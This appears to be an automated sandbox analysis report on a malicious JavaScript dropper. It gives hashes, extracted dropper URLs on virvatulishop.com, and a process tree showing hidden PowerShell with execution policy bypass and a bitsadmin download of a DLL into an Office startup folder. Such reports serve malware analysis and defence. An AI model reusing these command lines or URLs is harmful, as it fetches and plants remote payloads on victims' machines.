Analysis

  • max time kernel
    39s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
  • submitted
    09/07/2023, 19:19

General

  • Target

    ave603jsjsjsjsjsjsjsjsjsj.js

  • Size

    46KB

  • MD5

    734c08060ad526d0c40be2cdef4c84d4

  • SHA1

    4db13fddae48543582f8975884770d5ec4b56482

  • SHA256

    48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d

  • SHA512

    fe00bc4d731bd2e0493a255cc0de5a1ff05aac8091ba2134c02f47e8f1ff723afbb25113d21646980952fb4991c818e29034770913d59e118ad892b2d13d443e

  • SSDEEP

    768:2edhq6YG8y1GT/BibL8NmKspYMWjAtRi3i/WfCS8IFvHkgAJBFyt:jHJR1G9ibLomd6DMtRYi/jWfkgAJfyt

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://virvatulishop.com/labda.zip

exe.dropper

https://virvatulishop.com/files/

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2872

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1

    Filesize

    1KB

    MD5

    d85c0eada7610417ac3448efa1975122

    SHA1

    0243c3ac3e03279f6abc4817906ab95d74c8c2f7

    SHA256

    7689232c0352a14f0ff0967d88e6964eddaf25e2d282f8484fa17abb3b486a37

    SHA512

    b3e627647589839f6383942a5db24d3b46fe0068027307eb6805e933ea481d550f8c59eab566dd9a62af1e8126efbd8416ad870da489623107415f2a8067c7d1

  • memory/1720-60-0x000000001B2A0000-0x000000001B582000-memory.dmp

    Filesize

    2.9MB

  • memory/1720-61-0x0000000002040000-0x0000000002048000-memory.dmp

    Filesize

    32KB

  • memory/1720-63-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-64-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-65-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-66-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-67-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-68-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB

  • memory/1720-69-0x00000000025B0000-0x0000000002630000-memory.dmp

    Filesize

    512KB